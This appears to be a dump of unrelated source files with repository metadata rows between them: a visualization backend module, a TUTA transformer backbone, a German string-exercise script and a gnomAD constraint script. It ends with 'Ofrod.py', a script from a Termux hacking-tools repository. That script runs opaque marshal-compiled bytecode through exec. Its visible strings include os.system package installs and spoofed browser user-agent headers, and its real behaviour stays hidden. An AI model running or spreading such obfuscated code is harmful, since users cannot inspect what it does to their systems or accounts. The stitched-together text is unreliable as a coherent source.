header, encrypted etc.). For this, the key is packed into the corresponding dict, or the actual key is
stored in the private config file.
:param api_info: Information about the request (type, URL etc.)
:type api_info: dict
:param method: Method by which the key should be passed in the request
:type method: str
:param api_key_name: Name of the key, in case it should be stored in the private config file
:type api_key_name: str
:return: Prepared header and parameter dictionaries
"""
header = {}
parameter = {}
if method != "noAuth" and method != "BearerToken":
api_key_for_query = api_info["api_key_name"].split("||")[0]
api_key = api_info["api_key_name"].split("||")[1]
elif method == "BearerToken":
api_key = api_info["api_key_name"]
else:
return header, parameter
if api_key_name:
private_config = get_private()
private_config["api_keys"].update({api_key_name: api_key})
set_private(private_config)
# Checks whether and how the backend should authenticate with the API and sets the corresponding parameters
if method == "BearerToken":
header.update({"Authorization": "Bearer " + ("{_api_key}" if api_key_name else api_key)})
else:
if method == "BasicAuth":
header.update({"Authorization": "Basic " + b64encode(api_key_for_query.encode("utf-8") + b":" + api_key.encode("utf-8"))
.decode("utf-8")})
elif method == "KeyInHeader":
header.update({api_key_for_query: "{_api_key}" if api_key_name else api_key})
elif method == "KeyInQuery":
parameter.update({api_key_for_query: "{_api_key}" if api_key_name else api_key})
return header, parameter
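# Illustrative sketch (not part of the original module; "X-Api-Key" and "secret123"
# are made-up values): assuming api_info = {"api_key_name": "X-Api-Key||secret123"},
# the helper above would behave roughly like this:
#   >>> generate_request_dicts(api_info, "KeyInQuery")
#   ({}, {'X-Api-Key': 'secret123'})
#   >>> generate_request_dicts(api_info, "KeyInHeader")
#   ({'X-Api-Key': 'secret123'}, {})
#   >>> generate_request_dicts({"api_key_name": "secret123"}, "BearerToken")
#   ({'Authorization': 'Bearer secret123'}, {})
# If api_key_name is passed, the literal secret is written to the private config
# and the placeholder "{_api_key}" is inserted in its place.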
def _extract_custom_keys(calculates, formulas, replacements):
keys = []
keys += _extract_transform_keys(calculates, keys)
keys += [formula["formelName"] for formula in formulas]
keys += _extract_transform_keys(replacements, keys)
return keys
def _extract_transform_keys(transform, keys):
if type(transform) == list:
for x in range(len(transform)):
keys = _extract_transform_keys(transform[x], keys)
elif type(transform) == dict:
for key in list(transform.keys()):
if key == "new_keys":
for custom_key in transform[key]:
if "_loop|" in custom_key:
keys.append(custom_key.split("_loop|")[1])
else:
keys.append(custom_key)
return keys
def remove_toplevel_key(obj):
if type(obj) == list:
for x in range(len(obj)):
obj[x] = remove_toplevel_key(obj[x])
elif type(obj) == dict:
for key in list(obj.keys()):
obj[key] = remove_toplevel_key(obj[key])
elif type(obj) == str:
obj = obj.replace("$toplevel_array$", "").replace("||", "|").replace("| ", " ").replace("|}", "}")
if len(obj) > 0 and obj[-1] == "|":
obj = obj[:-1]
if len(obj) > 0 and obj[0] == "|":
obj = obj[1:]
return obj
def _extend_keys(obj, datasource_name, formula_keys):
if type(obj) == list:
for x in range(len(obj)):
obj[x] = _extend_keys(obj[x], datasource_name, formula_keys)
elif type(obj) == dict:
for key in list(obj.keys()):
obj[key] = _extend_keys(obj[key], datasource_name, formula_keys)
elif type(obj) == str:
if obj not in formula_keys:
obj = "_req|" + datasource_name + "|" + obj
else:
obj = datasource_name + "|" + obj
return obj
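# Illustrative sketch (hypothetical key and data source names): the helper above
# prefixes plain data keys with the request marker, while formula keys only get
# the data source prefix, e.g.
#   >>> _extend_keys("temperature", "weather", [])
#   '_req|weather|temperature'
#   >>> _extend_keys("maxTemp", "weather", ["maxTemp"])
#   'weather|maxTemp'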
def _extend_formula_keys(obj, datasource_name, formula_keys):
if type(obj) == list:
for x in range(len(obj)):
obj[x] = _extend_formula_keys(obj[x], datasource_name, formula_keys)
elif type(obj) == dict:
if "formelString" in obj:
obj["formelString"] = _extend_formula_keys(obj["formelString"], datasource_name, formula_keys)
elif type(obj) == str:
parts = re.split('[\*/\() %\+-]', obj)
transformed_keys = []
for part in parts:
try:
float(part)
except Exception:
transformed_keys = [key if key not in part else part for key in transformed_keys]
if part != "" and part not in formula_keys and part not in transformed_keys:
transformed_keys.append(part)
part_temp = remove_toplevel_key(part)
obj = obj.replace(part, "_req|" + datasource_name + "|" + part_temp)
return obj
def _insert_param_values(con, job_id, topic_values, config=True):
for pos, t in enumerate(topic_values):
position_id = con.execute("INSERT INTO job_topic_position(job_id, steps_id, position) VALUES (?, ?, ?)",
[job_id, t["topicId"], pos]).lastrowid
if config:
jtkvt = [(position_id,
k,
_to_untyped_value(v["value"], humps.decamelize(v["type"])),
humps.decamelize(v["type"]))
for k, v in t["values"].items()]
con.executemany("INSERT INTO job_config(position_id, key, value, type) VALUES(?, ?, ?, ?)", jtkvt)
def _generate_transform(formulas, old_transform):
transform = []
counter = 0
for method in old_transform:
transform.append(method)
for formula in formulas:
transform_part, counter = generate_step_transform(formula["formelString"], formula["formelName"], counter, copy=formula.get("copy_key", None), array_key=formula.get("array_key", None), loop_key=formula.get("loop_key", ""), decimal=formula.get("decimal", 2))
if transform_part is None:
return None
transform += transform_part
return transform
def _generate_storing(historized_data, datasource_name, formula_keys, old_storing):
storing = old_storing
historized_data = remove_toplevel_key(historized_data)
for key in historized_data:
key_string = "_req|" + datasource_name + "|" + key if key not in formula_keys else key
if key_string[-1] == "|":
key_string = key_string[:-1]
storing.append({
"name": key.replace("|", "_"),
"key": key_string
})
return storing
def _remove_unused_memory(datasource_names, infoprovider_name):
pre = infoprovider_name + "_"
dirs = [f.path for f in os.scandir(MEMORY_LOCATION) if f.is_dir()]
dirs = list(filter(lambda x: re.search(pre + ".*", x), dirs))
datasource_memory_dirs = list(map(lambda x: x.split("\\")[-1].replace(pre, ""), dirs))
for index, dir in enumerate(dirs):
if not datasource_memory_dirs[index] in datasource_names:
shutil.rmtree(dir, ignore_errors=True)
def _remove_datasources(con, infoprovider_id, remove_historised=False, datasource_names=None):
res = con.execute("SELECT * FROM datasource WHERE infoprovider_id=?", [infoprovider_id])
infoprovider_name = con.execute("SELECT infoprovider_name FROM infoprovider WHERE infoprovider_id=?", [infoprovider_id]).fetchone()["infoprovider_name"]
if datasource_names:
_remove_unused_memory(datasource_names, infoprovider_name)
for row in res:
file_path = get_datasource_file(row["datasource_id"])
os.remove(file_path)
if remove_historised:
shutil.rmtree(os.path.join(MEMORY_LOCATION, infoprovider_name.replace(" ", "-") + "_" + row["datasource_name"].replace(" ", "-")), ignore_errors=True)
_remove_historisation_schedule(con, row["datasource_id"])
con.execute("DELETE FROM datasource WHERE datasource_id=?", [row["datasource_id"]])
def _insert_historisation_schedule(con, schedule):
"""
Inserts the given schedule into the tables schedule_historisation and schedule_historisation_weekday.
:param con: Database connection.
:param schedule: Schedule as a dictionary.
:type schedule: dict
"""
type, time, date, weekdays, time_interval = _unpack_schedule(schedule)
schedule_id = con.execute("INSERT INTO schedule_historisation(type, time, date, time_interval) VALUES (?, ?, ?, ?)",
[type, time, date, time_interval]).lastrowid
if type == "weekly":
id_weekdays = [(schedule_id, d) for d in weekdays]
con.executemany("INSERT INTO schedule_historisation_weekday(schedule_historisation_id, weekday) VALUES(?, ?)",
id_weekdays)
return schedule_id
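# Illustrative sketch (hypothetical schedule payload): a weekly schedule such as
#   {"type": "weekly", "time": "12:00", "weekdays": [0, 2, 4]}
# is unpacked by _unpack_schedule into ("weekly", "12:00", None, [0, 2, 4], None)
# and results in one row in schedule_historisation plus one row per weekday in
# schedule_historisation_weekday.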
def _remove_historisation_schedule(con, datasource_id):
"""
Removes the historisation schedule of a data source.
:param con: Database connection.
:param datasource_id: ID of the data source.
:type datasource_id: int
"""
res = con.execute("SELECT schedule_historisation_id, type FROM schedule_historisation INNER JOIN datasource USING "
"(schedule_historisation_id) WHERE datasource_id=?", [datasource_id]).fetchone()
if res is None:
return
if res["type"] == "weekly":
con.execute("DELETE FROM schedule_historisation_weekday WHERE schedule_historisation_id=?",
[res["schedule_historisation_id"]])
con.execute("DELETE FROM schedule_historisation WHERE schedule_historisation_id=?",
[res["schedule_historisation_id"]])
def _insert_schedule(con, schedule):
type, time, date, weekdays, time_interval = _unpack_schedule(schedule)
schedule_id = con.execute("INSERT INTO schedule(type, time, date, time_interval) VALUES (?, ?, ?, ?)",
[type, time, date, time_interval]).lastrowid
if type == "weekly":
id_weekdays = [(schedule_id, d) for d in weekdays]
con.executemany("INSERT INTO schedule_weekday(schedule_id, weekday) VALUES(?, ?)", id_weekdays)
return schedule_id
def _insert_delete_options(con, delete_schedule):
type, days, hours, keep_count, fix_names_count = _unpack_delete_schedule(delete_schedule)
delete_options_id = con.execute(
"INSERT INTO delete_options(type, days, hours, k_count, fix_names_count) VALUES (?, ?, ?, ?, ?)",
[type, days, hours, keep_count, fix_names_count]).lastrowid
return delete_options_id
def _row_to_job(row):
job_id = row["job_id"]
job_name = row["job_name"]
weekdays = str(row["weekdays"]).split(",") if row["weekdays"] is not None else []
param_values = row["param_values"]
s_type = row["s_type"]
time = row["time"]
schedule = {
"type": humps.camelize(s_type)
}
if s_type == "daily":
schedule = {**schedule, "time": time}
if s_type == "weekly":
schedule = {**schedule, "time": time, "weekdays": [int(d) for d in weekdays]}
if s_type == "on_date":
schedule = {**schedule, "time": time, "date": row["date"]}
if s_type == "interval":
schedule = {**schedule, "interval": row["time_interval"], "nextExecution": row["next_execution"]}
d_type = row["d_type"]
delete_schedule = {
"type": humps.camelize(d_type)
}
if d_type == "on_day_hour":
delete_schedule = {**delete_schedule, "removalTime": {"days": int(row["days"]), "hours": int(row["hours"])}}
if d_type == "keep_count":
delete_schedule = {**delete_schedule, "keepCount": int(row["k_count"])}
if d_type == "fix_names":
delete_schedule = {**delete_schedule, "count": int(row["fix_names_count"])}
topic_values = [{}] * (int(row["topic_count"]))
for tp_s in row["topic_positions"].split(","):
tp = tp_s.split("::")
topic_id = tp[0]
topic_name = tp[1]
json_file_name = tp[2]
position = int(tp[3])
run_config = _get_topic_steps(json_file_name)["run_config"]
params = humps.camelize(_to_param_list(run_config))
topic_values[position] = {
"topicId": topic_id,
"topicName": topic_name,
"params": params,
"values": {}
}
if param_values is not None:
for vals_s in param_values.split(","):
vals = vals_s.split("::")
position = int(vals[0])
name = vals[1]
u_val = vals[2]
type = vals[3]
t_val = to_typed_value(u_val, type)
topic_values[position]["values"] = {
**topic_values[position]["values"],
name: t_val
}
return {
"jobId": job_id,
"jobName": job_name,
"schedule": schedule,
"deleteSchedule": delete_schedule,
"topicValues": topic_values
}
def _get_infoprovider_path(infoprovider_name: str):
return os.path.join(INFOPROVIDER_LOCATION, infoprovider_name) + ".json"
def _get_videojob_path(video_name: str):
return os.path.join(VIDEOJOB_LOCATION, video_name) + ".json"
def _get_datasource_path(datasource_name: str):
return os.path.join(DATASOURCE_LOCATION, datasource_name) + ".json"
def _get_scene_path(scene_name: str):
return os.path.join(SCENE_LOCATION, scene_name) + ".json"
def _get_steps_path(json_file_name: str):
return os.path.join(STEPS_LOCATION, json_file_name) + ".json"
def get_image_path(json_file_name: str, folder: str, image_type: str):
if folder != '':
os.makedirs(os.path.join(IMAGE_LOCATION, folder), exist_ok=True)
return os.path.join(IMAGE_LOCATION, folder, json_file_name) + "." + image_type
else:
return os.path.join(IMAGE_LOCATION, json_file_name) + "." + image_type
def _get_audio_path(json_file_name: str):
return os.path.join(AUDIO_LOCATION, json_file_name) + ".mp3"
def _get_topic_info(json_file_name: str):
try:
return _get_topic_steps(json_file_name).get("info", "")
except Exception:
return ""
def _get_topic_steps(json_file_name: str):
path_to_json = _get_steps_path(json_file_name.replace(".json", ""))
with open(path_to_json, encoding="utf-8") as fh:
return json.loads(fh.read())
def _get_values(param_string):
if param_string is None:
return []
kvts = [kvt.split(":") for kvt in param_string.split(",")]
values = {kvt[0]: to_typed_value(kvt[1], kvt[2]) for kvt in kvts}
return values
def _to_untyped_value(v, t):
if t in ["string", "enum"]:
return v
if t in ["multi_string"]:
return ";".join(v)
if t in ["multi_number"]:
return ";".join([str(n) for n in v])
if t in ["boolean", "sub_params", "number"]:
return str(v)
def to_typed_value(v, t):
if t in ["string", "enum"]:
return v
if t in ["number"]:
if "." in v:
return float(v)
return int(v)
if t in ["multi_string"]:
return v.split(";")
if t in ["multi_number"]:
return [float(n) if "." in n else int(n) for n in v.split(";")]
if t in ["boolean", "sub_params"]:
return v == "True"
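# Illustrative round trip (hypothetical values): _to_untyped_value([1, 2.5],
# "multi_number") stores the list as the string "1;2.5", and
# to_typed_value("1;2.5", "multi_number") parses it back into [1, 2.5];
# booleans are stored as the strings "True"/"False" and compared on read.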
def _unpack_schedule(schedule):
type = humps.decamelize(schedule["type"])
time = schedule["time"] if type != "interval" else None
date = schedule["date"] if type == "on_date" else None
if type == "interval":
time_interval = schedule.get("timeInterval", None)
if not time_interval:
time_interval = schedule["time_interval"]
else:
time_interval = None
weekdays = schedule["weekdays"] if type == "weekly" else None
return type, time, date, weekdays, time_interval
def _unpack_delete_schedule(delete_schedule):
delete_type = humps.decamelize(delete_schedule["type"])
days = delete_schedule["removalTime"]["days"] if delete_type == "on_day_hour" else None
hours = delete_schedule["removalTime"]["hours"] if delete_type == "on_day_hour" else None
keep_count = delete_schedule["keepCount"] if delete_type == "keep_count" else None
fix_names_count = delete_schedule["count"] if delete_type == "fix_names" else None
return delete_type, days, hours, keep_count, fix_names_count
def _to_param_list(run_config):
return [{**{"name": key},
**({**value, "type": humps.camelize(value["type"])}
if value["type"] != "sub_params"
else {**value, "type": "subParams", "sub_params": _to_param_list(value["sub_params"])})}
for key, value in run_config.items()]
| 40.926991 | 265 | 0.651981 |
64807514a800a3035596e5d01efed8b8b9e33aff | 7,364 | py | Python | tuta/model/backbones.py | PseudoLabs-Demo/TUTA_table_understanding | d0f3fe2f15c56a5ea9f593b210296f170fc74558 | ["MIT"] | 36 | 2021-06-15T01:04:27.000Z | 2022-03-19T16:36:54.000Z | tuta/model/backbones.py | PseudoLabs-Demo/TUTA_table_understanding | d0f3fe2f15c56a5ea9f593b210296f170fc74558 | ["MIT"] | 6 | 2021-09-03T11:29:36.000Z | 2021-12-15T11:33:57.000Z | tuta/model/backbones.py | PseudoLabs-Demo/TUTA_table_understanding | d0f3fe2f15c56a5ea9f593b210296f170fc74558 | ["MIT"] | 8 | 2021-11-03T04:32:36.000Z | 2022-02-02T13:43:47.000Z |
# -*- coding: utf-8 -*-
"""
Backbones of Pre-training Models (from input to last hidden-layer output)
"""
import torch
import torch.nn as nn
import model.embeddings as emb
import model.encoders as enc
class Backbone(nn.Module):
def __init__(self, config):
super(Backbone, self).__init__()
self.total_node = sum(config.node_degree)
self.attn_method = config.attn_method
self.attn_methods = {"max": self.pos2attn_max,
"add": self.pos2attn_add}
def unzip_tree_position(self, zipped_position):
"""
args: zipped_position: [batch_size, seq_len, tree_depth], range: [0, total_node]
rets: entire_position: [batch_size, seq_len, total_node]
lower_bound = 0, upper_bound = (total_node-1)
use one extra bit to temporarily represent not-applicable nodes
"""
batch_size, seq_len, _ = zipped_position.size()
entire_position = torch.zeros(batch_size, seq_len, self.total_node + 1).to(zipped_position.device)
entire_position = entire_position.scatter_(-1, zipped_position, 1.0).long()
entire_position = entire_position[:, :, : self.total_node] # remove last column
return entire_position
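# Illustrative sketch (hypothetical sizes, not from the original source): with
# total_node = 10 and one zipped position [[[1, 4, 7]]] of shape [1, 1, 3], the
# scatter produces a 0/1 vector of length 11 with ones at indices 1, 4 and 7;
# the extra 11th column is the scratch slot for not-applicable nodes and is cut
# off, leaving an entire-mode position of length total_node.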
def get_attention_mask(self, entire_top, entire_left, indicator):
attention_mask = self.attn_methods[self.attn_method](entire_top, entire_left)
attention_mask = self.create_post_mask(attention_mask, indicator)
return attention_mask
def pos2attn_max(self, pos_top, pos_left): # entire position
top_attn_mask = self.pos2attn(pos_top)
left_attn_mask = self.pos2attn(pos_left)
attn_mask = torch.max(top_attn_mask, left_attn_mask)
# attn_mask = top_attn_mask + left_attn_mask
return attn_mask
def pos2attn_add(self, pos_top, pos_left): # entire position
top_attn_mask = self.pos2attn(pos_top)
left_attn_mask = self.pos2attn(pos_left)
attn_mask = top_attn_mask + left_attn_mask
return attn_mask
def pos2attn(self, position): # entire position
"""Compute a one-dimension attention distance matrix from a entire-mode tree position. """
vector_matrix = position.unsqueeze(2).repeat(1, 1, position.size()[1], 1) # [batch, seq_len, seq_len, total_node]
attention_mask = torch.abs(vector_matrix - vector_matrix.transpose(1, 2))
attention_mask = torch.sum(attention_mask, dim=-1)
return attention_mask
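# Illustrative sketch (hypothetical entire positions): for p1 = [1, 0, 1, 0] and
# p2 = [0, 1, 1, 0], the pairwise tree distance is sum(|p1 - p2|) = 2, so the
# returned mask holds 2 at their off-diagonal entries and 0 on the diagonal.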
def create_post_mask(self, attn_dist, indicator, padding_dist=100):
"""
[CLS] sees all of the tokens except for the [PAD]s
[SEP]s in the table see each other & their own cells; [SEP]s in clc/tcr choices see the same as their tokens
Tokens see their friends and the corresponding [SEP]
"""
cls_matrix = (indicator == -1).long().unsqueeze(-1).repeat(1, 1, attn_dist.size(1))
cls_matrix = torch.max(cls_matrix, cls_matrix.transpose(-1, -2))
cls_matrix = -(cls_matrix * attn_dist)
pad_matrix = (indicator == 0).long().unsqueeze(-1).repeat(1, 1, attn_dist.size(1))
pad_matrix = torch.max(pad_matrix, pad_matrix.transpose(-1, -2)) * padding_dist
attn_dist = attn_dist + cls_matrix + pad_matrix
# only table-[SEP]s and root can see their contexts
sep_matrix = (indicator > 0).long() * (indicator%2 == 1).long()
sep_matrix = sep_matrix.unsqueeze(-1).repeat(1, 1, attn_dist.size(1))
sep_matrix = (1 - sep_matrix * sep_matrix.transpose(1, 2)) * padding_dist
attn_dist = attn_dist * (sep_matrix + 1)
return attn_dist
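# Illustrative reading of the masking rules above (derived from the code, not
# from the original paper): indicator == -1 ([CLS]) zeroes the distances in its
# row/column, indicator == 0 ([PAD]) pushes them up by padding_dist, and only
# pairs of odd positive indicators (table [SEP]s / root) keep their distances
# unscaled by the final (sep_matrix + 1) factor.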
def create_post_mask_padonly(self, attn_dist, indicator, padding_dist=100):
pad_matrix = (indicator == 0).long().unsqueeze(-1).repeat(1, 1, attn_dist.size(1))
pad_matrix = torch.max(pad_matrix, pad_matrix.transpose(-1, -2)) * padding_dist
attn_dist = attn_dist + pad_matrix
return attn_dist
class BbForBase(Backbone):
def __init__(self, config):
super(Backbone, self).__init__()
self.embeddings = emb.EmbeddingForBase(config)
self.encoder = enc.Encoder(config)
self.attn_methods = {"max": self.pos2attn_max,
"add": self.pos2attn_add}
self.attn_method = config.attn_method
self.total_node = sum(config.node_degree)
def forward(self, token_id, num_mag, num_pre, num_top, num_low, token_order, pos_top, pos_left, format_vec, indicator):
embedded_states = self.embeddings(token_id, num_mag, num_pre, num_top, num_low, token_order, format_vec)
entire_pos_top = self.unzip_tree_position(pos_top)
entire_pos_left = self.unzip_tree_position(pos_left)
attn_mask = self.get_attention_mask(entire_pos_top, entire_pos_left, indicator)
encoded_states = self.encoder(embedded_states, attn_mask)
return encoded_states
class BbForTutaExplicit(Backbone):
def __init__(self, config):
super(Backbone, self).__init__()
self.embeddings = emb.EmbeddingForTutaExplicit(config)
self.encoder = enc.Encoder(config)
self.attn_methods = {"max": self.pos2attn_max,
"add": self.pos2attn_add}
self.attn_method = config.attn_method
self.total_node = sum(config.node_degree)
def forward(self,
token_id, num_mag, num_pre, num_top, num_low,
token_order, pos_row, pos_col, pos_top, pos_left,
format_vec, indicator
):
entire_pos_top = self.unzip_tree_position(pos_top)
entire_pos_left = self.unzip_tree_position(pos_left)
embedded_states = self.embeddings(
token_id, num_mag, num_pre, num_top, num_low,
token_order, pos_row, pos_col, entire_pos_top, entire_pos_left, format_vec
)
attn_mask = self.get_attention_mask(entire_pos_top, entire_pos_left, indicator)
encoded_states = self.encoder(embedded_states, attn_mask)
return encoded_states
class BbForTuta(Backbone):
def __init__(self, config):
super(Backbone, self).__init__()
self.embeddings = emb.EmbeddingForTuta(config)
self.encoder = enc.Encoder(config)
self.attn_methods = {"max": self.pos2attn_max,
"add": self.pos2attn_add}
self.attn_method = config.attn_method
self.total_node = sum(config.node_degree)
def forward(self,
token_id, num_mag, num_pre, num_top, num_low,
token_order, pos_row, pos_col, pos_top, pos_left,
format_vec, indicator
):
embedded_states = self.embeddings(
token_id, num_mag, num_pre, num_top, num_low,
token_order, pos_row, pos_col, pos_top, pos_left, format_vec
)
entire_pos_top = self.unzip_tree_position(pos_top)
entire_pos_left = self.unzip_tree_position(pos_left)
attn_mask = self.get_attention_mask(entire_pos_top, entire_pos_left, indicator)
encoded_states = self.encoder(embedded_states, attn_mask)
return encoded_states
BACKBONES = {
"tuta": BbForTuta,
"base": BbForBase,
"tuta_explicit": BbForTutaExplicit
}
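# Illustrative usage (hypothetical config object and tensor shapes): a training
# script would pick the backbone through this registry, e.g.
#   backbone = BACKBONES["tuta"](config)
#   hidden = backbone(token_id, num_mag, num_pre, num_top, num_low, token_order,
#                     pos_row, pos_col, pos_top, pos_left, format_vec, indicator)
# where the arguments are torch tensors batched over the token sequence.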
| 44.361446 | 124 | 0.655622 |
375866ce992114d014302f3769e14a9b6d44e134 | 1,091 | py | Python | Python/Buch_ATBS/Teil_2/Kapitel_09_Dateien_verwalten/01_uebung_lueckentext/22_uebung_lueckentext.py | Apop85/Scripts | 1d8dad316c55e1f1343526eac9e4b3d0909e4873 | ["MIT"] | null | null | null | Python/Buch_ATBS/Teil_2/Kapitel_09_Dateien_verwalten/01_uebung_lueckentext/22_uebung_lueckentext.py | Apop85/Scripts | 1d8dad316c55e1f1343526eac9e4b3d0909e4873 | ["MIT"] | 6 | 2020-12-24T15:15:09.000Z | 2022-01-13T01:58:35.000Z | Python/Buch_ATBS/Teil_2/Kapitel_09_Dateien_verwalten/01_uebung_lueckentext/22_uebung_lueckentext.py | Apop85/Scripts | 1d8dad316c55e1f1343526eac9e4b3d0909e4873 | ["MIT"] | null | null | null |
# 22_uebung_lueckentext.py
# This exercise is about replacing parts of strings with string values supplied by the user.
# The text is read from a file and contains a gap text in which the values to be replaced are marked with NOMEN, ADJEKTIV, VERB.
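# Illustrative example (hypothetical file contents): if replaceme.txt contains
# "Das ADJEKTIV NOMEN will VERB.", the regex below separates the upper-case
# keywords from the text in between, the user is prompted once per keyword
# ("Bitte ein Adjektiv eingeben: ..."), and the completed sentence is written
# to output.txt.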
import os, re
filepfad=os.path.dirname(__file__)
os.chdir(filepfad)
def file_open():
global content, replace
replace=0
filename='replaceme.txt'
if os.path.exists(filename):
file=open(filename, 'r')
content=file.read()
file.close()
find_snippets()
def find_snippets():
suchmuster=re.compile(r'([A-Z]{4,})|(\w?[^A-Z]{2,}[A-Z]?[^A-Z]+)')
ergebnis=suchmuster.findall(content)
choose_words(ergebnis)
def choose_words(liste):
neuer_satz=''
for eintrag in liste:
if eintrag[0] == '':
neuer_satz+=eintrag[1]
else:
auswahl=input('Bitte ein '+eintrag[0].title()+' eingeben: ')
neuer_satz+=auswahl
save_file(neuer_satz)
def save_file(text):
print(text)
file=open('output.txt', 'w')
file.write(text)
file.close()
file_open()
| 24.795455 | 159 | 0.707608 |
37974ce1f38c1df69cba4c51ff69e981d6cdcca5 | 1,059 | py | Python | data-pipeline/src/data_pipeline/datasets/gnomad_v2/gnomad_v2_constraint.py | broadinstitute/gnomadjs | 00da72cdc2cb0753f822c51456ec15147c024a1d | ["MIT"] | 38 | 2018-02-24T02:33:52.000Z | 2020-03-03T23:17:04.000Z | data-pipeline/src/data_pipeline/datasets/gnomad_v2/gnomad_v2_constraint.py | broadinstitute/gnomadjs | 00da72cdc2cb0753f822c51456ec15147c024a1d | ["MIT"] | 385 | 2018-02-21T16:53:13.000Z | 2020-03-04T00:52:40.000Z | data-pipeline/src/data_pipeline/datasets/gnomad_v2/gnomad_v2_constraint.py | broadinstitute/gnomadjs | 00da72cdc2cb0753f822c51456ec15147c024a1d | ["MIT"] | 13 | 2020-05-01T13:03:54.000Z | 2022-02-28T13:12:57.000Z |
import hail as hl
def prepare_gnomad_v2_constraint(path):
ds = hl.read_table(path)
# Don't need the information in globals for the browser
ds = ds.select_globals()
# Select relevant fields
ds = ds.select(
# ID
transcript_id=ds.transcript,
gene_id=ds.gene_id,
# Expected
exp_lof=ds.exp_lof,
exp_mis=ds.exp_mis,
exp_syn=ds.exp_syn,
# Observed
obs_lof=ds.obs_lof,
obs_mis=ds.obs_mis,
obs_syn=ds.obs_syn,
# Observed/Expected
oe_lof=ds.oe_lof,
oe_lof_lower=ds.oe_lof_lower,
oe_lof_upper=ds.oe_lof_upper,
oe_mis=ds.oe_mis,
oe_mis_lower=ds.oe_mis_lower,
oe_mis_upper=ds.oe_mis_upper,
oe_syn=ds.oe_syn,
oe_syn_lower=ds.oe_syn_lower,
oe_syn_upper=ds.oe_syn_upper,
# Z
lof_z=ds.lof_z,
mis_z=ds.mis_z,
syn_z=ds.syn_z,
# Other
pli=ds.pLI,
flags=ds.constraint_flag,
)
ds = ds.key_by("transcript_id")
return ds
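# Illustrative usage (hypothetical path): the pipeline would call something like
#   ds = prepare_gnomad_v2_constraint("gs://my-bucket/constraint.ht")
# and get back a Hail table keyed by transcript_id with expected/observed counts,
# obs/exp ratios and bounds, Z scores, pLI and constraint flags.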
| 23.533333 | 59 | 0.595845 |
80d213377b292e640046d4ebd0e3f1da7b67fb03 | 66,279 | py | Python | OFROD-main/Ofrod.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | ["Apache-2.0"] | 2 | 2021-11-17T03:35:03.000Z | 2021-12-08T06:00:31.000Z | OFROD-main/Ofrod.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | ["Apache-2.0"] | null | null | null | OFROD-main/Ofrod.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | ["Apache-2.0"] | 2 | 2021-11-05T18:07:48.000Z | 2022-02-24T21:25:07.000Z |
#Compiled By Raka Andrian
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00sp\x03\x00\x00y\xb0\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x01\x00l\x0b\x00Z\x0b\x00d\x00\x00d\x01\x00l\x0c\x00Z\x0c\x00d\x00\x00d\x02\x00l\r\x00m\x0e\x00Z\x0e\x00\x01Wn+\x00\x04e\x0f\x00k\n\x00r\xdd\x00\x01\x01\x01e\x00\x00j\x10\x00d\x03\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x04\x00\x83\x01\x00\x01n\x01\x00Xe\x00\x00j\x10\x00d\x05\x00\x83\x01\x00\x01e\x00\x00j\x11\x00j\x12\x00d\x06\x00\x83\x01\x00s\r\x01e\x00\x00j\x10\x00d\x07\x00\x83\x01\x00\x01n\x00\x00e\x00\x00j\x11\x00j\x12\x00d\x08\x00\x83\x01\x00s/\x01e\x00\x00j\x10\x00d\t\x00\x83\x01\x00\x01n\x00\x00d\x00\x00d\n\x00l\x13\x00m\x14\x00Z\x14\x00\x01e\x00\x00j\x10\x00d\x0b\x00\x83\x01\x00\x01e\x00\x00j\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00s\xc1\x01e\x00\x00j\x10\x00d\r\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x0e\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x0f\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x10\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x05\x00\x83\x01\x00\x01d\x11\x00GHe\x00\x00j\x10\x00d\x12\x00\x83\x01\x00\x01e\x02\x00j\x15\x00d\x13\x00\x83\x01\x00\x01nh\x00e\x00\x00j\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00r)\x02e\x00\x00j\x10\x00d\r\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x0e\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x10\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x05\x00\x83\x01\x00\x01d\x11\x00GHe\x00\x00j\x10\x00d\x14\x00\x83\x01\x00\x01e\x02\x00j\x15\x00d\x13\x00\x83\x01\x00\x01n\x00\x00e\x05\x00j\x16\x00d\x15\x00d\x16\x00\x83\x02\x00Z\x17\x00e\x05\x00j\x16\x00d\x17\x00d\x18\x00\x83\x02\x00Z\x18\x00i\x08\x00e\x19\x00e\x17\x00\x83\x01\x00d\x19\x006e\x19\x00e\x18\x00\x83\x01\x00d\x1a\x006e\x19\x00e\x18\x00\x83\x01\x00d\x1b\x006d\x1c\x00d\x1d\x006d\x1e\x00d\x1f\x006d \x00d!\x006d"\x00d#\x006d$\x00d%\x006Z\x1a\x00e\x1b\x00e\x01\x00\x83\x01\x00\x01e\x01\x00j\x1c\x00d&\x00\x83\x01\x00\x01d\'\x00Z\x1d\x00d(\x00Z\x1e\x00d)\x00Z\x1f\x00d*\x00\x84\x00\x00Z 